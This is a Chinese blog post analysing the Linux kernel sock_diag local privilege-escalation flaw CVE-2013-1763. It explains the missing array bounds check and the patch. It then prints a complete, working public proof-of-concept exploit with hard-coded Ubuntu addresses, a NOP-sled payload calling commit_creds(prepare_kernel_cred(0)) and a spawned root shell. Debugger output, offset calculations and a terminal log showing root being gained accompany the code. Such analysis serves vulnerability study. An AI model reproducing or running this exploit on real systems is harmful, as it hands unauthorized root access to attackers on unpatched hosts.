为什么80%的码农都做不了架构师?>>>   

kernel 最近出了一个新的本地提权安全漏洞CVE-2013-1763,影响范围比较广泛,ubuntu,Arch,fedora都受到其影响,漏洞刚公布就有牛人发布了利用该漏洞获取root权限的攻击代码,下面会分析该代码是如何获取root权限的。

首先对CVE-2013-1763这个安全漏洞简单介绍一下。

1. 漏洞描述

在net/core/sock_diag.c中,__sock_diag_rcv_msg函数未对sock_diag_handlers数组传入的下标做边界检查,导致可能越界,进而导致可执行代码的漏洞。没有root权限的用户可以利用该漏洞获取到root权限。

2. 漏洞的影响范围

linux kernel 3.0-3.7.10

3. 漏洞曝光时间

2013/02/19

4. 漏洞产生的原因

首先看一下这个漏洞的patch:

net/core/sock_diag.c View file @ 6e601a5
@@ -121,6 +121,9 @@ static int __sock_diag_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh)if (nlmsg_len(nlh) < sizeof(*req))return -EINVAL;+  if (req->sdiag_family >= AF_MAX)
+    return -EINVAL;
+hndl = sock_diag_lock_handler(req->sdiag_family);if (hndl == NULL)err = -ENOENT;

Patch 很简单,只是加上了数组边界判断而已。那么在看看sock_diag_lock_hander这个函数做了些什么:

static const inline struct sock_diag_handler *sock_diag_lock_handler(int family)
{if (sock_diag_handlers[family] == NULL)request_module("net-pf-%d-proto-%d-type-%d", PF_NETLINK,NETLINK_SOCK_DIAG, family);mutex_lock(&sock_diag_table_mutex);return sock_diag_handlers[family];//这个函数没有对传入的family的值的范围,进行验证,从而造成数组越界.
}

这个函数也没有做什么,只是对 sock_diag_lock_hander[family]进行检测,是否为NULL,如果为NULL申请注册,然后加上了一把锁,最后返回的是它的地址。

static struct sock_diag_handler *sock_diag_handlers[AF_MAX];  //可以看出,这个指针数组最大为AF_MAX AF_MAX = 40.

接着我们再看看完整的__sock_diag_rcv_msg函数。

static int __sock_diag_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh)
{int err;struct sock_diag_req *req = NLMSG_DATA(nlh);struct sock_diag_handler *hndl;if (nlmsg_len(nlh) < sizeof(*req))return -EINVAL;hndl = sock_diag_lock_handler(req->sdiag_family);//这里传入sdiag_family的值,然后返回数组指针sock_diag_handlers[reg->sdiag_family].由于没有做边界判断,那么就可以越界。if (hndl == NULL)err = -ENOENT;elseerr = hndl->dump(skb, nlh); //看到这里是不是很激动呢,利用这里可以让它执行我们自己的代码sock_diag_unlock_handler(hndl);return err;
}

5. 漏洞的利用

虽然已经找到了kernel中有这样一个漏洞,但是如何利用这个漏洞来执行我们自己的程序,取得root权限还是需要很困难的,需要对kernel系统以及计算机运行原理非常了解才可以,并且这些程序往往需要精细设计才能达到最终的目的。 下面是某牛人写的exploit代码,请欣赏:

/*
* quick'n'dirty poc for CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8
* bug found by Spender
* poc by SynQ
*
* hard-coded for 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/Linux
* using nl_table->hash.rehash_time, index 81
*
* Fedora 18 support added
*
* 2/2013
*/#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <netinet/tcp.h>
#include <errno.h>
#include <linux/if.h>
#include <linux/filter.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <linux/sock_diag.h>
#include <linux/inet_diag.h>
#include <linux/unix_diag.h>
#include <sys/mman.h>typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;int __attribute__((regparm(3)))    //这是指示GCC编译器选用3个寄存器代替堆栈来传递参数。
kernel_code()
{commit_creds(prepare_kernel_cred(0));  //这行代码执行之后就可以获取root权限,但是这两个函数都是内核函数,必须在内核态执行才有效。return -1;
}//这段函数没有使用,用来解释hard code jump[] 为什么是那些数值
int jump_payload_not_used(void *skb, void *nlh)
{asm volatile ("mov $kernel_code, %eax\n""call *%eax\n");
}unsigned long
get_symbol(char *name)  //为了获取内核函数地址
{FILE *f;unsigned long addr;char dummy, sym[512];int ret = 0;f = fopen("/proc/kallsyms", "r");if (!f) {return 0;}while (ret != EOF) {ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym);if (ret == 0) {fscanf(f, "%s\n", sym);continue;}if (!strcmp(name, sym)) {printf("[+] resolved symbol %s to %p\n", name, (void *) addr);fclose(f);return addr;}}fclose(f);return 0;
}int main(int argc, char*argv[])
{int fd;unsigned family;struct {struct nlmsghdr nlh;  //socket协议netlink数据包的格式struct unix_diag_req r;} req;char  buf[8192];//创建一个netlink协议的socket,因为__sock_diag_rcv_msg函数是属于NETLINK_SOCK_DIAG的if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){printf("Can't create sock diag socket\n");return -1;}//填充数据包,就是为了最终能够执行到__sock_diag_rcv_msg中去memset(&req, 0, sizeof(req));req.nlh.nlmsg_len = sizeof(req);req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;req.nlh.nlmsg_seq = 123456;//req.r.sdiag_family = 89;req.r.udiag_states = -1;req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;if(argc==1){printf("Run: %s Fedora|Ubuntu\n",argv[0]);return 0;}else if(strcmp(argv[1],"Fedora")==0){commit_creds = (_commit_creds) get_symbol("commit_creds");prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");sock_diag_handlers = get_symbol("sock_diag_handlers");nl_table = get_symbol("nl_table");if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table){printf("some symbols are not available!\n");exit(1);}family = (nl_table - sock_diag_handlers) / 4;printf("family=%d\n",family);req.r.sdiag_family = family;if(family>255){printf("nl_table is too far!\n");exit(1);}}else if(strcmp(argv[1],"Ubuntu")==0){commit_creds = (_commit_creds) 0xc106bc60;prepare_kernel_cred = (_prepare_kernel_cred) 0xc106bea0;req.r.sdiag_family = 81;}unsigned long mmap_start, mmap_size;mmap_start = 0x10000;  //选择了一块1MB多的内存区域mmap_size = 0x120000;  printf("mmapping at 0x%lx, size = 0x%lx\n", mmap_start, mmap_size);if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {printf("mmap fault\n");exit(1);}memset((void*)mmap_start, 0x90, mmap_size);         //将其全部填充为0x90,在X86系统中对应的是NOP指令char jump[] = "\x55\x89\xe5\xb8\x11\x11\x11\x11\xff\xd0\x5d\xc3"; // jump_payload in asmunsigned long *asd = &jump[4];*asd = (unsigned long)kernel_code; //使用kernel_code函数的地址替换掉jump[]中的0x11//将jump这段代码放在mmap内存区域的最后,也就是说只要最后能够跳转到这块区域,就可以执行到jump代码,进而跳转执行kernel_code,因为这块区域中布满了NOP指令。memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump));//所有准备工作完成之后,最后在这里发送socket触发这个漏洞if ( send(fd, &req, sizeof(req), 0) < 0) {printf("bad send\n");close(fd);return -1;}printf("uid=%d, euid=%d\n",getuid(), geteuid() );if(!getuid())system("/bin/sh");
}

6. exploit代码分析

在分析之前,有些概念要澄清一下,在linux系统中,用户空间和内核空间是独立存在的。在一个32位的linux系统中,每个进程会虚拟出4G的内存空间,其中3G是用户空间,1G是内核空间,用户空间的地址范围是0&times;00000000 到 0xBFFFFFFF,内核空间的地址是0xC0000000 到 0xFFFFFFFF。内核地址空间由所有进程共享,但只有运行在内核态的进程才能访问,用户进程可以通过系统调用切换到内核态访问内核空间,进程运行在内核态时所产生的地址都属于内核空间。

commit_creds 和prepare_kernel_cred 均为内核函数,如果要执行他们就应该切换到内核状态运行。当执行内核函数__sock_diag_rcv_msg是处于内核态的,所以这个时候调用执行kernel_code函数就可以取得root权限。

那么如何调用kernel_code函数呢?所有我们mmap了一块从0x10000开始0x120000大小的内存空间,然后将这块空间写满NOP指令,将跳转执行kernel_code的代码放在这块区域的最后面,也就是说,只要跳转执行到这块内存区域的(除了jump代码块内部)都会顺利跑到kernel_code函数。这种方法叫做NOP slide,就像坐滑滑梯一样,自然滑到底部。jump这一段代码的分析如下:

char jump[] = "\x55\x89\xe5\xb8\x11\x11\x11\x11\xff\xd0\x5d\xc3"; // jump_payload in asmunsigned long *asd = &jump[4];*asd = (unsigned long)kernel_code;int jump_payload_not_used(void *skb, void *nlh)
{asm volatile ("mov $kernel_code, %eax\n""call *%eax\n");
}fengguoqing@VirtualBox:~/Downloads$ gcc CVE-2013-1763.c
CVE-2013-1763.c: In function ‘main’:
CVE-2013-1763.c:148:26: warning: initialization from incompatible pointer type [enabled by default]
fengguoqing@VirtualBox:~/Downloads$ objdump -D a.out
….
08048763 <jump_payload_not_used>:8048763:  55                     push   %ebp8048764:  89 e5                  mov    %esp,%ebp8048766:  b8 3c 87 04 08         mov    $0x804873c,%eax804876b:  ff d0                  call   *%eax804876d:  5d                     pop    %ebp804876e:  c3                     ret
….(gdb) p/x jump
$2 = {0x55, 0x89, 0xe5, 0xb8, 0x3c, 0x87, 0x4, 0x8, 0xff, 0xd0, 0x5d, 0xc3, 0x0} //最后发现0x11被填充成了kernel_code的地址
(gdb) p kernel_code
$4 = {int ()} 0x804873c <kernel_code>

问题的关键变成了如何才能跳转到这一块内存区域呢?先看看下面这结构体的定义:

struct nlmsghdr {__u32       nlmsg_len;  /* Length of message including header */__u16       nlmsg_type; /* Message content */__u16       nlmsg_flags;    /* Additional flags */__u32       nlmsg_seq;  /* Sequence number */__u32       nlmsg_pid;  /* Sending process port ID */};struct unix_diag_req {__u8    sdiag_family;__u8    sdiag_protocol;__u16   pad;__u32   udiag_states;__u32   udiag_ino;__u32   udiag_show;__u32   udiag_cookie[2];};struct sock_diag_handler {__u8 family;//int (*dump)(struct sk_buff *skb, struct nlmsghdr *nlh);
};struct netlink_table {struct nl_portid_hash   hash; //取回这个值struct hlist_head       mc_list;struct listeners __rcu  *listeners;unsigned int            flags;unsigned int            groups;struct mutex            *cb_mutex;struct module           *module;void                    (*bind)(int group);int                     registered;};struct nl_portid_hash {struct hlist_head       *table; 四个字节unsigned long           rehash_time; //也是四个字节.0x00012b59//这个值在我们的那个范围内.unsigned int            mask;unsigned int            shift;unsigned int            entries;unsigned int            max_shift;u32                     rnd;};static struct netlink_table *nl_table;

我们的牛人发现了nl_table里面有一个变量rehash_time的值正好在0x10000-0x130000这个区域内,所以可以利用这个值来跳转,只需要将sock_diag_handlers[sdiag_family]-dump正好落在这个值上就可以了。如下图所示

所以我们需要先知道nl_table和sock_diag_handlers的地址,可以通过以下两种方式查看。

cat /proc/kallsyms
sudo cat /boot/System.map-3.2.0-43-generic-pae

但是在ubuntu系统中前一种方法无法查看到变量函数的地址,所以只有使用第二种方法了,由于 nl_table和 sock_diag_handlers都是指针,所以他们的大小都是4个字节。于是就可以计算出 sdiag_family的取值了。

fengguoqing@VirtualBox:~$ sudo cat /boot/System.map-3.5.0-17-generic |grep nl_table
c189b5c0 d nl_table_lock
c189b5c4 d nl_table_wait
c1a488e0 b nl_table_users
c1a488e4 b nl_table
fengguoqing@VirtualBox:~$ sudo cat /boot/System.map-3.5.0-17-generic |grep sock_diag_handlers
c1a487a0 b sock_diag_handlers
(0xc1a488e4 - 0xc1a487a0) / 4 = 81L

至此所有的谜题都解开了,然后就可以高高兴兴的黑自己一把了:

fengguoqing@VirtualBox:~/Downloads$ gcc -o CVE-2013-1763 CVE-2013-1763.c
CVE-2013-1763.c: In function ‘main’:
CVE-2013-1763.c:148:26: warning: initialization from incompatible pointer type [enabled by default]
fengguoqing@VirtualBox:~/Downloads$ id
uid=1000(fengguoqing) gid=1000(fengguoqing) groups=1000(fengguoqing),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),107(lpadmin),124(sambashare)
fengguoqing@VirtualBox:~/Downloads$ ./CVE-2013-1763 Ubuntu
mmapping at 0x10000, size = 0x120000
uid=0, euid=0
# id
uid=0(root) gid=0(root) groups=0(root)

由于在sock_diag_lock_handler中有mutex_lock(&sock_diag_table_mutex),但是我们在后面将程序引入到其他地方,并没有接着执行 mutex_unlock(&sock_diag_table_mutex),所以按道理只能root成功一次,但是我在测试中发现有时候可以root多次,有时候root一次之后就不能再root了,需要重启才可以重新root。

7. 参考网站

CVE:http://cve.mitre.org/cgi-bin/cvename...=CVE-2013-1763

NVD: http://web.nvd.nist.gov/view/vuln/de...=CVE-2013-1763

Patch: CONFIRM:http://git.kernel.org/?p=linux/kerne...e0b6894ffd79c0

Exploit: http://www.exploit-db.com

维基百科Netlink:http://zh.wikipedia.org/wiki/Netlink

转载于:https://my.oschina.net/fgq611/blog/181812

linux kernel 本地提权漏洞CVE-2013-1763 exploit 代码分析相关推荐

  1. Dirty Pipe – Linux 内核本地提权漏洞

    一.漏洞简介 CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞.攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root ...

  2. 绿盟科技 linux漏洞,绿盟科技发布LINUX内核本地提权漏洞技术分析与防护方案

    Linux内核的内存子系统在处理写时拷贝(Copy-on-Write,缩写为COW)时存在条件竞争漏洞,导致可以破坏私有只读内存映射.一个低权限的本地用户能够利用此漏洞获取其他只读内存映射的写权限,进 ...

  3. linux自动更新漏洞,Linux爆本地提权漏洞 请立即更新udev程序

    Linux的udev程序再爆本地提权漏洞,本地用户可以轻易获得root权限,请立即更新udev程序.(2.4内核系统不受影响) 修复方法(修复前请备份重要数据): debian用户请执行apt-get ...

  4. Linux爆本地提权漏洞 请立即更新udev程序

    Linux的udev程序再爆本地提权漏洞,本地用户可以轻易获得root权限,请立即更新udev程序.(2.4内核系统不受影响) 修复方法(修复前请备份重要数据): debian用户请执行apt-get ...

  5. 2019最有意思的五大 ZDI 案例之:通过调色板索引实现 Win32k.sys 本地提权漏洞(上)...

     聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 本文是趋势科技 ZDI 项目推出的第二届年度最有意思的五大案例系列文章之一.他们从1000多份安全公告中遴选出这些案例,奇安信代码卫士 ...

  6. sqlite字段是否存在_【漏洞预警】Linux内核存在本地提权漏洞(CVE20198912)

    更多资讯和分析文章请关注启明星辰ADLab微信公众号及官方网站(adlab.venustech.com.cn) 漏洞背景 近日,Linux git中发布一个commit补丁,该补丁对应的漏洞是一个本地 ...

  7. 【CVE-2021-4043】Linux本地提权漏洞复现

    实验步骤 文章目录 实验步骤 CVE-2021-4043 Linux本地提权漏洞 实验背景 实验环境 漏洞复现 构造payload 用gcc编译后上传到阿里云 执行payload 漏洞修复 CVE-2 ...

  8. Linux 系统安全 - 近期发现的 polkit pkexec 本地提权漏洞(CVE-2021-4034)修复方案

    时间: 20220-1-25 事件: qualys 安全研究人员披露 CVE-2021-4034 polkit pkexec 本地提权漏洞细节. 漏洞描述: polkit pkexec 中对命令行参数 ...

  9. 开源OS FreeBSD 中 ftpd chroot 本地提权漏洞 (CVE-2020-7468) 的技术分析

     聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 7月份,一名匿名研究员向 ZDI 报告了 FreeBSD 中的一个本地提权漏洞.它位于 FreeBSD 的文件传输协议守护进程 (ft ...

  10. CVE-2016-1240 Tomcat 服务本地提权漏洞

    catalogue 1. 漏洞背景 2. 影响范围 3. 漏洞原理 4. 漏洞PoC 5. 修复方案 1. 漏洞背景 Tomcat是个运行在Apache上的应用服务器,支持运行Servlet/JSP应 ...

最新文章

  1. 对于注册中心,ZooKeeper、Eureka哪个更合适?
  2. event.stopPropagation和event.preventDefault有什么区别?
  3. QA:智能布线系统二十问
  4. MTK for Google AttestationKey介绍
  5. centos安装zendopcache
  6. Swoole源代码学习记录(十五)——Timer模块分析
  7. OC2_点语法(属性关键字)
  8. 看到他我一下子就悟了---委托
  9. 剑指offer面试题28. 对称的二叉树(递归)
  10. 设计模式--状态模式(C语言实现)
  11. SpringBoot+POI方式导出excel【加水印】
  12. PS制作光束散射的旋转文字效果
  13. ORACLE中通过SQL语句(alter table)来增加、删除、修改字段
  14. 云台山风景区:秋末冬初,走进湘中小镇的诗意时光
  15. Unity -- UI -- Scroll Rect
  16. 如何用今日头条来赚钱?那些闷声发大财的达人们都是这样做的
  17. 拉新促活:社交平台唤醒App的高效策略
  18. Lanproxy 路径遍历漏洞 (CVE-2021-3019)
  19. JavaWeb学习笔记(HTML语言)
  20. 我为什么要考非全日制研究生

热门文章

  1. ffmpeg 转换VC工具 V1.1.1
  2. MongoDB中文问题
  3. 【转】浅论ViewState及其与Session的关系
  4. Raspbian 2019-06-20 发布
  5. Django基础—— 4.项目目录结构
  6. Extjs4.1.x使用Application动态按需加载MVC各模块
  7. CSU 1120 病毒(DP)
  8. vc++6.0如何调试
  9. 深入Managed DirectX9(十五)
  10. 希望 线段树 01背包